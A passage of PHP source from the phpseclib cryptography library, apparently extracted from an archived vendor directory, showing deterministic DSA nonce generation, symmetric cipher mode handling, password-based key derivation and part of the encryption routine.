(empty($this->format)) { throw new NoKeyLoadedException('This key was created with createKey - it was not loaded with load. Therefore there is no "loaded format"'); } $meta = new \ReflectionClass($this->format); return $meta->getShortName(); } /** * Returns the key's comment * * Not all key formats support comments. If you want to set a comment use toString() * * @return null|string */ public function getComment() { return $this->comment; } /** * Tests engine validity * */ public static function useBestEngine() { static::$engines = [ 'PHP' => true, 'OpenSSL' => extension_loaded('openssl'), // this test can be satisfied by either of the following: // http://php.net/manual/en/book.sodium.php // https://github.com/paragonie/sodium_compat 'libsodium' => function_exists('sodium_crypto_sign_keypair') ]; return static::$engines; } /** * Flag to use internal engine only (useful for unit testing) * */ public static function useInternalEngine() { static::$engines = [ 'PHP' => true, 'OpenSSL' => false, 'libsodium' => false ]; } /** * __toString() magic method * * @return string */ public function __toString() { return $this->toString('PKCS8'); } /** * Determines which hashing function should be used * * @param string $hash */ public function withHash($hash) { $new = clone $this; $new->hash = new Hash($hash); $new->hmac = new Hash($hash); return $new; } /** * Returns the hash algorithm currently being used * */ public function getHash() { return clone $this->hash; } /** * Compute the pseudorandom k for signature generation, * using the process specified for deterministic DSA. * * @param string $h1 * @return string */ protected function computek($h1) { $v = str_repeat("\1", strlen($h1)); $k = str_repeat("\0", strlen($h1)); $x = $this->int2octets($this->x); $h1 = $this->bits2octets($h1); $this->hmac->setKey($k); $k = $this->hmac->hash($v . "\0" . $x . $h1); $this->hmac->setKey($k); $v = $this->hmac->hash($v); $k = $this->hmac->hash($v . "\1" . $x . $h1); $this->hmac->setKey($k); $v = $this->hmac->hash($v); $qlen = $this->q->getLengthInBytes(); while (true) { $t = ''; while (strlen($t) < $qlen) { $v = $this->hmac->hash($v); $t = $t . $v; } $k = $this->bits2int($t); if (!$k->equals(self::$zero) && $k->compare($this->q) < 0) { break; } $k = $this->hmac->hash($v . "\0"); $this->hmac->setKey($k); $v = $this->hmac->hash($v); } return $k; } /** * Integer to Octet String * * @param \phpseclib3\Math\BigInteger $v * @return string */ private function int2octets($v) { $out = $v->toBytes(); $rolen = $this->q->getLengthInBytes(); if (strlen($out) < $rolen) { return str_pad($out, $rolen, "\0", STR_PAD_LEFT); } elseif (strlen($out) > $rolen) { return substr($out, -$rolen); } else { return $out; } } /** * Bit String to Integer * * @param string $in * @return \phpseclib3\Math\BigInteger */ protected function bits2int($in) { $v = new BigInteger($in, 256); $vlen = strlen($in) << 3; $qlen = $this->q->getLength(); if ($vlen > $qlen) { return $v->bitwise_rightShift($vlen - $qlen); } return $v; } /** * Bit String to Octet String * * @param string $in * @return string */ private function bits2octets($in) { $z1 = $this->bits2int($in); $z2 = $z1->subtract($this->q); return $z2->compare(self::$zero) < 0 ? $this->int2octets($z1) : $this->int2octets($z2); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/Common/BlockCipher.php000064400000001026147600400120023177 0ustar00 * @author Hans-Juergen Petrich * @copyright 2007 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\Common; /** * Base Class for all block cipher classes * * @author Jim Wigginton */ abstract class BlockCipher extends SymmetricKey { } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/Common/SymmetricKey.php000064400000373777147600400120023470 0ustar00 * @author Hans-Juergen Petrich * @copyright 2007 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\Common; use phpseclib3\Common\Functions\Strings; use phpseclib3\Crypt\Blowfish; use phpseclib3\Crypt\Hash; use phpseclib3\Exception\BadDecryptionException; use phpseclib3\Exception\BadModeException; use phpseclib3\Exception\InconsistentSetupException; use phpseclib3\Exception\InsufficientSetupException; use phpseclib3\Exception\UnsupportedAlgorithmException; use phpseclib3\Math\BigInteger; use phpseclib3\Math\BinaryField; use phpseclib3\Math\PrimeField; /** * Base Class for all \phpseclib3\Crypt\* cipher classes * * @author Jim Wigginton * @author Hans-Juergen Petrich */ abstract class SymmetricKey { /** * Encrypt / decrypt using the Counter mode. * * Set to -1 since that's what Crypt/Random.php uses to index the CTR mode. * * @link http://en.wikipedia.org/wiki/Block_cipher_modes_of_operation#Counter_.28CTR.29 * @see \phpseclib3\Crypt\Common\SymmetricKey::encrypt() * @see \phpseclib3\Crypt\Common\SymmetricKey::decrypt() */ const MODE_CTR = -1; /** * Encrypt / decrypt using the Electronic Code Book mode. * * @link http://en.wikipedia.org/wiki/Block_cipher_modes_of_operation#Electronic_codebook_.28ECB.29 * @see \phpseclib3\Crypt\Common\SymmetricKey::encrypt() * @see \phpseclib3\Crypt\Common\SymmetricKey::decrypt() */ const MODE_ECB = 1; /** * Encrypt / decrypt using the Code Book Chaining mode. * * @link http://en.wikipedia.org/wiki/Block_cipher_modes_of_operation#Cipher-block_chaining_.28CBC.29 * @see \phpseclib3\Crypt\Common\SymmetricKey::encrypt() * @see \phpseclib3\Crypt\Common\SymmetricKey::decrypt() */ const MODE_CBC = 2; /** * Encrypt / decrypt using the Cipher Feedback mode. * * @link http://en.wikipedia.org/wiki/Block_cipher_modes_of_operation#Cipher_feedback_.28CFB.29 * @see \phpseclib3\Crypt\Common\SymmetricKey::encrypt() * @see \phpseclib3\Crypt\Common\SymmetricKey::decrypt() */ const MODE_CFB = 3; /** * Encrypt / decrypt using the Cipher Feedback mode (8bit) * * @see \phpseclib3\Crypt\Common\SymmetricKey::encrypt() * @see \phpseclib3\Crypt\Common\SymmetricKey::decrypt() */ const MODE_CFB8 = 7; /** * Encrypt / decrypt using the Output Feedback mode (8bit) * * @see \phpseclib3\Crypt\Common\SymmetricKey::encrypt() * @see \phpseclib3\Crypt\Common\SymmetricKey::decrypt() */ const MODE_OFB8 = 8; /** * Encrypt / decrypt using the Output Feedback mode. * * @link http://en.wikipedia.org/wiki/Block_cipher_modes_of_operation#Output_feedback_.28OFB.29 * @see \phpseclib3\Crypt\Common\SymmetricKey::encrypt() * @see \phpseclib3\Crypt\Common\SymmetricKey::decrypt() */ const MODE_OFB = 4; /** * Encrypt / decrypt using Galois/Counter mode. * * @link https://en.wikipedia.org/wiki/Galois/Counter_Mode * @see \phpseclib3\Crypt\Common\SymmetricKey::encrypt() * @see \phpseclib3\Crypt\Common\SymmetricKey::decrypt() */ const MODE_GCM = 5; /** * Encrypt / decrypt using streaming mode. * * @see \phpseclib3\Crypt\Common\SymmetricKey::encrypt() * @see \phpseclib3\Crypt\Common\SymmetricKey::decrypt() */ const MODE_STREAM = 6; /** * Mode Map * * @see \phpseclib3\Crypt\Common\SymmetricKey::__construct() */ const MODE_MAP = [ 'ctr' => self::MODE_CTR, 'ecb' => self::MODE_ECB, 'cbc' => self::MODE_CBC, 'cfb' => self::MODE_CFB, 'cfb8' => self::MODE_CFB8, 'ofb' => self::MODE_OFB, 'ofb8' => self::MODE_OFB8, 'gcm' => self::MODE_GCM, 'stream' => self::MODE_STREAM ]; /** * Base value for the internal implementation $engine switch * * @see \phpseclib3\Crypt\Common\SymmetricKey::__construct() */ const ENGINE_INTERNAL = 1; /** * Base value for the eval() implementation $engine switch * * @see \phpseclib3\Crypt\Common\SymmetricKey::__construct() */ const ENGINE_EVAL = 2; /** * Base value for the mcrypt implementation $engine switch * * @see \phpseclib3\Crypt\Common\SymmetricKey::__construct() */ const ENGINE_MCRYPT = 3; /** * Base value for the openssl implementation $engine switch * * @see \phpseclib3\Crypt\Common\SymmetricKey::__construct() */ const ENGINE_OPENSSL = 4; /** * Base value for the libsodium implementation $engine switch * * @see \phpseclib3\Crypt\Common\SymmetricKey::__construct() */ const ENGINE_LIBSODIUM = 5; /** * Base value for the openssl / gcm implementation $engine switch * * @see \phpseclib3\Crypt\Common\SymmetricKey::__construct() */ const ENGINE_OPENSSL_GCM = 6; /** * Engine Reverse Map * * @see \phpseclib3\Crypt\Common\SymmetricKey::getEngine() */ const ENGINE_MAP = [ self::ENGINE_INTERNAL => 'PHP', self::ENGINE_EVAL => 'Eval', self::ENGINE_MCRYPT => 'mcrypt', self::ENGINE_OPENSSL => 'OpenSSL', self::ENGINE_LIBSODIUM => 'libsodium', self::ENGINE_OPENSSL_GCM => 'OpenSSL (GCM)' ]; /** * The Encryption Mode * * @see self::__construct() * @var int */ protected $mode; /** * The Block Length of the block cipher * * @var int */ protected $block_size = 16; /** * The Key * * @see self::setKey() * @var string */ protected $key = false; /** * HMAC Key * * @see self::setupGCM() * @var ?string */ protected $hKey = false; /** * The Initialization Vector * * @see self::setIV() * @var string */ protected $iv = false; /** * A "sliding" Initialization Vector * * @see self::enableContinuousBuffer() * @see self::clearBuffers() * @var string */ protected $encryptIV; /** * A "sliding" Initialization Vector * * @see self::enableContinuousBuffer() * @see self::clearBuffers() * @var string */ protected $decryptIV; /** * Continuous Buffer status * * @see self::enableContinuousBuffer() * @var bool */ protected $continuousBuffer = false; /** * Encryption buffer for CTR, OFB and CFB modes * * @see self::encrypt() * @see self::clearBuffers() * @var array */ protected $enbuffer; /** * Decryption buffer for CTR, OFB and CFB modes * * @see self::decrypt() * @see self::clearBuffers() * @var array */ protected $debuffer; /** * mcrypt resource for encryption * * The mcrypt resource can be recreated every time something needs to be created or it can be created just once. * Since mcrypt operates in continuous mode, by default, it'll need to be recreated when in non-continuous mode. * * @see self::encrypt() * @var resource */ private $enmcrypt; /** * mcrypt resource for decryption * * The mcrypt resource can be recreated every time something needs to be created or it can be created just once. * Since mcrypt operates in continuous mode, by default, it'll need to be recreated when in non-continuous mode. * * @see self::decrypt() * @var resource */ private $demcrypt; /** * Does the enmcrypt resource need to be (re)initialized? * * @see \phpseclib3\Crypt\Twofish::setKey() * @see \phpseclib3\Crypt\Twofish::setIV() * @var bool */ private $enchanged = true; /** * Does the demcrypt resource need to be (re)initialized? * * @see \phpseclib3\Crypt\Twofish::setKey() * @see \phpseclib3\Crypt\Twofish::setIV() * @var bool */ private $dechanged = true; /** * mcrypt resource for CFB mode * * mcrypt's CFB mode, in (and only in) buffered context, * is broken, so phpseclib implements the CFB mode by it self, * even when the mcrypt php extension is available. * * In order to do the CFB-mode work (fast) phpseclib * use a separate ECB-mode mcrypt resource. * * @link http://phpseclib.sourceforge.net/cfb-demo.phps * @see self::encrypt() * @see self::decrypt() * @see self::setupMcrypt() * @var resource */ private $ecb; /** * Optimizing value while CFB-encrypting * * Only relevant if $continuousBuffer enabled * and $engine == self::ENGINE_MCRYPT * * It's faster to re-init $enmcrypt if * $buffer bytes > $cfb_init_len than * using the $ecb resource furthermore. * * This value depends of the chosen cipher * and the time it would be needed for it's * initialization [by mcrypt_generic_init()] * which, typically, depends on the complexity * on its internaly Key-expanding algorithm. * * @see self::encrypt() * @var int */ protected $cfb_init_len = 600; /** * Does internal cipher state need to be (re)initialized? * * @see self::setKey() * @see self::setIV() * @see self::disableContinuousBuffer() * @var bool */ protected $changed = true; /** * Does Eval engie need to be (re)initialized? * * @see self::setup() * @var bool */ protected $nonIVChanged = true; /** * Padding status * * @see self::enablePadding() * @var bool */ private $padding = true; /** * Is the mode one that is paddable? * * @see self::__construct() * @var bool */ private $paddable = false; /** * Holds which crypt engine internaly should be use, * which will be determined automatically on __construct() * * Currently available $engines are: * - self::ENGINE_LIBSODIUM (very fast, php-extension: libsodium, extension_loaded('libsodium') required) * - self::ENGINE_OPENSSL_GCM (very fast, php-extension: openssl, extension_loaded('openssl') required) * - self::ENGINE_OPENSSL (very fast, php-extension: openssl, extension_loaded('openssl') required) * - self::ENGINE_MCRYPT (fast, php-extension: mcrypt, extension_loaded('mcrypt') required) * - self::ENGINE_EVAL (medium, pure php-engine, no php-extension required) * - self::ENGINE_INTERNAL (slower, pure php-engine, no php-extension required) * * @see self::setEngine() * @see self::encrypt() * @see self::decrypt() * @var int */ protected $engine; /** * Holds the preferred crypt engine * * @see self::setEngine() * @see self::setPreferredEngine() * @var int */ private $preferredEngine; /** * The mcrypt specific name of the cipher * * Only used if $engine == self::ENGINE_MCRYPT * * @link http://www.php.net/mcrypt_module_open * @link http://www.php.net/mcrypt_list_algorithms * @see self::setupMcrypt() * @var string */ protected $cipher_name_mcrypt; /** * The openssl specific name of the cipher * * Only used if $engine == self::ENGINE_OPENSSL * * @link http://www.php.net/openssl-get-cipher-methods * @var string */ protected $cipher_name_openssl; /** * The openssl specific name of the cipher in ECB mode * * If OpenSSL does not support the mode we're trying to use (CTR) * it can still be emulated with ECB mode. * * @link http://www.php.net/openssl-get-cipher-methods * @var string */ protected $cipher_name_openssl_ecb; /** * The default salt used by setPassword() * * @see self::setPassword() * @var string */ private $password_default_salt = 'phpseclib/salt'; /** * The name of the performance-optimized callback function * * Used by encrypt() / decrypt() * only if $engine == self::ENGINE_INTERNAL * * @see self::encrypt() * @see self::decrypt() * @see self::setupInlineCrypt() * @var Callback */ protected $inline_crypt; /** * If OpenSSL can be used in ECB but not in CTR we can emulate CTR * * @see self::openssl_ctr_process() * @var bool */ private $openssl_emulate_ctr = false; /** * Don't truncate / null pad key * * @see self::clearBuffers() * @var bool */ private $skip_key_adjustment = false; /** * Has the key length explicitly been set or should it be derived from the key, itself? * * @see self::setKeyLength() * @var bool */ protected $explicit_key_length = false; /** * Hash subkey for GHASH * * @see self::setupGCM() * @see self::ghash() * @var BinaryField\Integer */ private $h; /** * Additional authenticated data * * @var string */ protected $aad = ''; /** * Authentication Tag produced after a round of encryption * * @var string */ protected $newtag = false; /** * Authentication Tag to be verified during decryption * * @var string */ protected $oldtag = false; /** * GCM Binary Field * * @see self::__construct() * @see self::ghash() * @var BinaryField */ private static $gcmField; /** * Poly1305 Prime Field * * @see self::enablePoly1305() * @see self::poly1305() * @var PrimeField */ private static $poly1305Field; /** * Flag for using regular vs "safe" intval * * @see self::initialize_static_variables() * @var boolean */ protected static $use_reg_intval; /** * Poly1305 Key * * @see self::setPoly1305Key() * @see self::poly1305() * @var string */ protected $poly1305Key; /** * Poly1305 Flag * * @see self::setPoly1305Key() * @see self::enablePoly1305() * @var boolean */ protected $usePoly1305 = false; /** * The Original Initialization Vector * * GCM uses the nonce to build the IV but we want to be able to distinguish between nonce-derived * IV's and user-set IV's * * @see self::setIV() * @var string */ private $origIV = false; /** * Nonce * * Only used with GCM. We could re-use setIV() but nonce's can be of a different length and * toggling between GCM and other modes could be more complicated if we re-used setIV() * * @see self::setNonce() * @var string */ protected $nonce = false; /** * Default Constructor. * * $mode could be: * * - ecb * * - cbc * * - ctr * * - cfb * * - cfb8 * * - ofb * * - ofb8 * * - gcm * * @param string $mode * @throws BadModeException if an invalid / unsupported mode is provided */ public function __construct($mode) { $mode = strtolower($mode); // necessary because of 5.6 compatibility; we can't do isset(self::MODE_MAP[$mode]) in 5.6 $map = self::MODE_MAP; if (!isset($map[$mode])) { throw new BadModeException('No valid mode has been specified'); } $mode = self::MODE_MAP[$mode]; // $mode dependent settings switch ($mode) { case self::MODE_ECB: case self::MODE_CBC: $this->paddable = true; break; case self::MODE_CTR: case self::MODE_CFB: case self::MODE_CFB8: case self::MODE_OFB: case self::MODE_OFB8: case self::MODE_STREAM: $this->paddable = false; break; case self::MODE_GCM: if ($this->block_size != 16) { throw new BadModeException('GCM is only valid for block ciphers with a block size of 128 bits'); } if (!isset(self::$gcmField)) { self::$gcmField = new BinaryField(128, 7, 2, 1, 0); } $this->paddable = false; break; default: throw new BadModeException('No valid mode has been specified'); } $this->mode = $mode; static::initialize_static_variables(); } /** * Initialize static variables */ protected static function initialize_static_variables() { if (!isset(self::$use_reg_intval)) { switch (true) { // PHP_OS & "\xDF\xDF\xDF" == strtoupper(substr(PHP_OS, 0, 3)), but a lot faster case (PHP_OS & "\xDF\xDF\xDF") === 'WIN': case !function_exists('php_uname'): case !is_string(php_uname('m')): case (php_uname('m') & "\xDF\xDF\xDF") != 'ARM': case defined('PHP_INT_SIZE') && PHP_INT_SIZE == 8: self::$use_reg_intval = true; break; case (php_uname('m') & "\xDF\xDF\xDF") == 'ARM': switch (true) { /* PHP 7.0.0 introduced a bug that affected 32-bit ARM processors: https://github.com/php/php-src/commit/716da71446ebbd40fa6cf2cea8a4b70f504cc3cd altho the changelogs make no mention of it, this bug was fixed with this commit: https://github.com/php/php-src/commit/c1729272b17a1fe893d1a54e423d3b71470f3ee8 affected versions of PHP are: 7.0.x, 7.1.0 - 7.1.23 and 7.2.0 - 7.2.11 */ case PHP_VERSION_ID >= 70000 && PHP_VERSION_ID <= 70123: case PHP_VERSION_ID >= 70200 && PHP_VERSION_ID <= 70211: self::$use_reg_intval = false; break; default: self::$use_reg_intval = true; } } } } /** * Sets the initialization vector. * * setIV() is not required when ecb or gcm modes are being used. * * {@internal Can be overwritten by a sub class, but does not have to be} * * @param string $iv * @throws \LengthException if the IV length isn't equal to the block size * @throws \BadMethodCallException if an IV is provided when one shouldn't be */ public function setIV($iv) { if ($this->mode == self::MODE_ECB) { throw new \BadMethodCallException('This mode does not require an IV.'); } if ($this->mode == self::MODE_GCM) { throw new \BadMethodCallException('Use setNonce instead'); } if (!$this->usesIV()) { throw new \BadMethodCallException('This algorithm does not use an IV.'); } if (strlen($iv) != $this->block_size) { throw new \LengthException('Received initialization vector of size ' . strlen($iv) . ', but size ' . $this->block_size . ' is required'); } $this->iv = $this->origIV = $iv; $this->changed = true; } /** * Enables Poly1305 mode. * * Once enabled Poly1305 cannot be disabled. * * @throws \BadMethodCallException if Poly1305 is enabled whilst in GCM mode */ public function enablePoly1305() { if ($this->mode == self::MODE_GCM) { throw new \BadMethodCallException('Poly1305 cannot be used in GCM mode'); } $this->usePoly1305 = true; } /** * Enables Poly1305 mode. * * Once enabled Poly1305 cannot be disabled. If $key is not passed then an attempt to call createPoly1305Key * will be made. * * @param string $key optional * @throws \LengthException if the key isn't long enough * @throws \BadMethodCallException if Poly1305 is enabled whilst in GCM mode */ public function setPoly1305Key($key = null) { if ($this->mode == self::MODE_GCM) { throw new \BadMethodCallException('Poly1305 cannot be used in GCM mode'); } if (!is_string($key) || strlen($key) != 32) { throw new \LengthException('The Poly1305 key must be 32 bytes long (256 bits)'); } if (!isset(self::$poly1305Field)) { // 2^130-5 self::$poly1305Field = new PrimeField(new BigInteger('3fffffffffffffffffffffffffffffffb', 16)); } $this->poly1305Key = $key; $this->usePoly1305 = true; } /** * Sets the nonce. * * setNonce() is only required when gcm is used * * @param string $nonce * @throws \BadMethodCallException if an nonce is provided when one shouldn't be */ public function setNonce($nonce) { if ($this->mode != self::MODE_GCM) { throw new \BadMethodCallException('Nonces are only used in GCM mode.'); } $this->nonce = $nonce; $this->setEngine(); } /** * Sets additional authenticated data * * setAAD() is only used by gcm or in poly1305 mode * * @param string $aad * @throws \BadMethodCallException if mode isn't GCM or if poly1305 isn't being utilized */ public function setAAD($aad) { if ($this->mode != self::MODE_GCM && !$this->usePoly1305) { throw new \BadMethodCallException('Additional authenticated data is only utilized in GCM mode or with Poly1305'); } $this->aad = $aad; } /** * Returns whether or not the algorithm uses an IV * * @return bool */ public function usesIV() { return $this->mode != self::MODE_GCM && $this->mode != self::MODE_ECB; } /** * Returns whether or not the algorithm uses a nonce * * @return bool */ public function usesNonce() { return $this->mode == self::MODE_GCM; } /** * Returns the current key length in bits * * @return int */ public function getKeyLength() { return $this->key_length << 3; } /** * Returns the current block length in bits * * @return int */ public function getBlockLength() { return $this->block_size << 3; } /** * Returns the current block length in bytes * * @return int */ public function getBlockLengthInBytes() { return $this->block_size; } /** * Sets the key length. * * Keys with explicitly set lengths need to be treated accordingly * * @param int $length */ public function setKeyLength($length) { $this->explicit_key_length = $length >> 3; if (is_string($this->key) && strlen($this->key) != $this->explicit_key_length) { $this->key = false; throw new InconsistentSetupException('Key has already been set and is not ' . $this->explicit_key_length . ' bytes long'); } } /** * Sets the key. * * The min/max length(s) of the key depends on the cipher which is used. * If the key not fits the length(s) of the cipher it will paded with null bytes * up to the closest valid key length. If the key is more than max length, * we trim the excess bits. * * If the key is not explicitly set, it'll be assumed to be all null bytes. * * {@internal Could, but not must, extend by the child Crypt_* class} * * @param string $key */ public function setKey($key) { if ($this->explicit_key_length !== false && strlen($key) != $this->explicit_key_length) { throw new InconsistentSetupException('Key length has already been set to ' . $this->explicit_key_length . ' bytes and this key is ' . strlen($key) . ' bytes'); } $this->key = $key; $this->key_length = strlen($key); $this->setEngine(); } /** * Sets the password. * * Depending on what $method is set to, setPassword()'s (optional) parameters are as follows: * {@link http://en.wikipedia.org/wiki/PBKDF2 pbkdf2} or pbkdf1: * $hash, $salt, $count, $dkLen * * Where $hash (default = sha1) currently supports the following hashes: see: Crypt/Hash.php * {@link https://en.wikipedia.org/wiki/Bcrypt bcypt}: * $salt, $rounds, $keylen * * This is a modified version of bcrypt used by OpenSSH. * * {@internal Could, but not must, extend by the child Crypt_* class} * * @see Crypt/Hash.php * @param string $password * @param string $method * @param int|string ...$func_args * @throws \LengthException if pbkdf1 is being used and the derived key length exceeds the hash length * @throws \RuntimeException if bcrypt is being used and a salt isn't provided * @return bool */ public function setPassword($password, $method = 'pbkdf2', ...$func_args) { $key = ''; $method = strtolower($method); switch ($method) { case 'bcrypt': if (!isset($func_args[2])) { throw new \RuntimeException('A salt must be provided for bcrypt to work'); } $salt = $func_args[0]; $rounds = isset($func_args[1]) ? $func_args[1] : 16; $keylen = isset($func_args[2]) ? $func_args[2] : $this->key_length; $key = Blowfish::bcrypt_pbkdf($password, $salt, $keylen + $this->block_size, $rounds); $this->setKey(substr($key, 0, $keylen)); $this->setIV(substr($key, $keylen)); return true; case 'pkcs12': // from https://tools.ietf.org/html/rfc7292#appendix-B.2 case 'pbkdf1': case 'pbkdf2': // Hash function $hash = isset($func_args[0]) ? strtolower($func_args[0]) : 'sha1'; $hashObj = new Hash(); $hashObj->setHash($hash); // WPA and WPA2 use the SSID as the salt $salt = isset($func_args[1]) ? $func_args[1] : $this->password_default_salt; // RFC2898#section-4.2 uses 1,000 iterations by default // WPA and WPA2 use 4,096. $count = isset($func_args[2]) ? $func_args[2] : 1000; // Keylength if (isset($func_args[3])) { if ($func_args[3] <= 0) { throw new \LengthException('Derived key length cannot be longer 0 or less'); } $dkLen = $func_args[3]; } else { $key_length = $this->explicit_key_length !== false ? $this->explicit_key_length : $this->key_length; $dkLen = $method == 'pbkdf1' ? 2 * $key_length : $key_length; } switch (true) { case $method == 'pkcs12': /* In this specification, however, all passwords are created from BMPStrings with a NULL terminator. This means that each character in the original BMPString is encoded in 2 bytes in big-endian format (most-significant byte first). There are no Unicode byte order marks. The 2 bytes produced from the last character in the BMPString are followed by 2 additional bytes with the value 0x00. -- https://tools.ietf.org/html/rfc7292#appendix-B.1 */ $password = "\0" . chunk_split($password, 1, "\0") . "\0"; /* This standard specifies 3 different values for the ID byte mentioned above: 1. If ID=1, then the pseudorandom bits being produced are to be used as key material for performing encryption or decryption. 2. If ID=2, then the pseudorandom bits being produced are to be used as an IV (Initial Value) for encryption or decryption. 3. If ID=3, then the pseudorandom bits being produced are to be used as an integrity key for MACing. */ // Construct a string, D (the "diversifier"), by concatenating v/8 // copies of ID. $blockLength = $hashObj->getBlockLengthInBytes(); $d1 = str_repeat(chr(1), $blockLength); $d2 = str_repeat(chr(2), $blockLength); $s = ''; if (strlen($salt)) { while (strlen($s) < $blockLength) { $s .= $salt; } } $s = substr($s, 0, $blockLength); $p = ''; if (strlen($password)) { while (strlen($p) < $blockLength) { $p .= $password; } } $p = substr($p, 0, $blockLength); $i = $s . $p; $this->setKey(self::pkcs12helper($dkLen, $hashObj, $i, $d1, $count)); if ($this->usesIV()) { $this->setIV(self::pkcs12helper($this->block_size, $hashObj, $i, $d2, $count)); } return true; case $method == 'pbkdf1': if ($dkLen > $hashObj->getLengthInBytes()) { throw new \LengthException('Derived key length cannot be longer than the hash length'); } $t = $password . $salt; for ($i = 0; $i < $count; ++$i) { $t = $hashObj->hash($t); } $key = substr($t, 0, $dkLen); $this->setKey(substr($key, 0, $dkLen >> 1)); if ($this->usesIV()) { $this->setIV(substr($key, $dkLen >> 1)); } return true; case !in_array($hash, hash_algos()): $i = 1; $hashObj->setKey($password); while (strlen($key) < $dkLen) { $f = $u = $hashObj->hash($salt . pack('N', $i++)); for ($j = 2; $j <= $count; ++$j) { $u = $hashObj->hash($u); $f ^= $u; } $key .= $f; } $key = substr($key, 0, $dkLen); break; default: $key = hash_pbkdf2($hash, $password, $salt, $count, $dkLen, true); } break; default: throw new UnsupportedAlgorithmException($method . ' is not a supported password hashing method'); } $this->setKey($key); return true; } /** * PKCS#12 KDF Helper Function * * As discussed here: * * {@link https://tools.ietf.org/html/rfc7292#appendix-B} * * @see self::setPassword() * @param int $n * @param \phpseclib3\Crypt\Hash $hashObj * @param string $i * @param string $d * @param int $count * @return string $a */ private static function pkcs12helper($n, $hashObj, $i, $d, $count) { static $one; if (!isset($one)) { $one = new BigInteger(1); } $blockLength = $hashObj->getBlockLength() >> 3; $c = ceil($n / $hashObj->getLengthInBytes()); $a = ''; for ($j = 1; $j <= $c; $j++) { $ai = $d . $i; for ($k = 0; $k < $count; $k++) { $ai = $hashObj->hash($ai); } $b = ''; while (strlen($b) < $blockLength) { $b .= $ai; } $b = substr($b, 0, $blockLength); $b = new BigInteger($b, 256); $newi = ''; for ($k = 0; $k < strlen($i); $k += $blockLength) { $temp = substr($i, $k, $blockLength); $temp = new BigInteger($temp, 256); $temp->setPrecision($blockLength << 3); $temp = $temp->add($b); $temp = $temp->add($one); $newi .= $temp->toBytes(false); } $i = $newi; $a .= $ai; } return substr($a, 0, $n); } /** * Encrypts a message. * * $plaintext will be padded with additional bytes such that it's length is a multiple of the block size. Other cipher * implementations may or may not pad in the same manner. Other common approaches to padding and the reasons why it's * necessary are discussed in the following * URL: * * {@link http://www.di-mgt.com.au/cryptopad.html http://www.di-mgt.com.au/cryptopad.html} * * An alternative to padding is to, separately, send the length of the file. This is what SSH, in fact, does. * strlen($plaintext) will still need to be a multiple of the block size, however, arbitrary values can be added to make it that * length. * * {@internal Could, but not must, extend by the child Crypt_* class} * * @see self::decrypt() * @param string $plaintext * @return string $ciphertext */ public function encrypt($plaintext) { if ($this->paddable) { $plaintext = $this->pad($plaintext); } $this->setup(); if ($this->mode == self::MODE_GCM) { $oldIV = $this->iv; Strings::increment_str($this->iv); $cipher = new static('ctr'); $cipher->setKey($this->key); $cipher->setIV($this->iv); $ciphertext = $cipher->encrypt($plaintext); $s = $this->ghash( self::nullPad128($this->aad) . self::nullPad128($ciphertext) . self::len64($this->aad) . self::len64($ciphertext) ); $cipher->encryptIV = $this->iv = $this->encryptIV = $this->decryptIV = $oldIV; $this->newtag = $cipher->encrypt($s); return $ciphertext; } if (isset($this->poly1305Key)) { $cipher = clone $this; unset($cipher->poly1305Key); $this->usePoly1305 = false; $ciphertext = $cipher->encrypt($plaintext); $this->newtag = $this->poly1305($ciphertext); return $ciphertext; } if ($this->engine === self::ENGINE_OPENSSL) { switch ($this->mode) { case self::MODE_STREAM: return openssl_encrypt($plaintext, $this->cipher_name_openssl, $this->key, OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING); case self::MODE_ECB: return openssl_encrypt($plaintext, $this->cipher_name_openssl, $this->key, OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING); case self::MODE_CBC: $result = openssl_encrypt($plaintext, $this->cipher_name_openssl, $this->key, OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING, $this->encryptIV); if ($this->continuousBuffer) { $this->encryptIV = substr($result, -$this->block_size); } return $result; case self::MODE_CTR: return $this->openssl_ctr_process($plaintext, $this->encryptIV, $this->enbuffer); case self::MODE_CFB: // cfb loosely routines inspired by openssl's: // {@link http://cvs.openssl.org/fileview?f=openssl/crypto/modes/cfb128.c&v=} $ciphertext = ''; if ($this->continuousBuffer) { $iv = &$this->encryptIV; $pos = &$this->enbuffer['pos']; } else { $iv = $this->encryptIV; $pos = 0; } $len = strlen($plaintext); $i = 0; if ($pos) { $orig_pos = $pos; $max = $this->block_size - $pos; if ($len >= $max) { $i = $max; $len -= $max; $pos = 0; } else { $i = $len; $pos += $len; $len = 0; } // ie. $i = min($max, $len), $len-= $i, $pos+= $i, $pos%= $blocksize $ciphertext = substr($iv, $orig_pos) ^ $plaintext; $iv = substr_replace($iv, $ciphertext, $orig_pos, $i); $plaintext = substr($plaintext, $i); } $overflow = $len % $this->block_size; if ($overflow) { $ciphertext .= openssl_encrypt(substr($plaintext, 0, -$overflow) . str_repeat("\0", $this->block_size), $this->cipher_name_openssl, $this->key, OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING, $iv); $iv = Strings::pop($ciphertext, $this->block_size); $size = $len - $overflow; $block = $iv ^ substr($plaintext, -$overflow); $iv = substr_replace($iv, $block, 0, $overflow); $ciphertext .= $block; $pos = $overflow; } elseif ($len) { $ciphertext = openssl_encrypt($plaintext, $this->cipher_name_openssl, $this->key, OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING, $iv); $iv = substr($ciphertext, -$this->block_size); } return $ciphertext; case self::MODE_CFB8: $ciphertext = openssl_encrypt($plaintext, $this->cipher_name_openssl, $this->key, OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING, $this->encryptIV); if ($this->continuousBuffer) { if (($len = strlen($ciphertext)) >= $this->block_size) { $this->encryptIV = substr($ciphertext, -$this->block_size); } else { $this->encryptIV = substr($this->encryptIV, $len - $this->block_size) . substr($ciphertext, -$len); } } return $ciphertext; case self::MODE_OFB8: $ciphertext = ''; $len = strlen($plaintext); $iv = $this->encryptIV; for ($i = 0; $i < $len; ++$i) { $xor = openssl_encrypt($iv, $this->cipher_name_openssl_ecb, $this->key, $this->openssl_options, $this->decryptIV); $ciphertext .= $plaintext[$i] ^ $xor; $iv = substr($iv, 1) . $xor[0]; } if ($this->continuousBuffer) { $this->encryptIV = $iv; } break; case 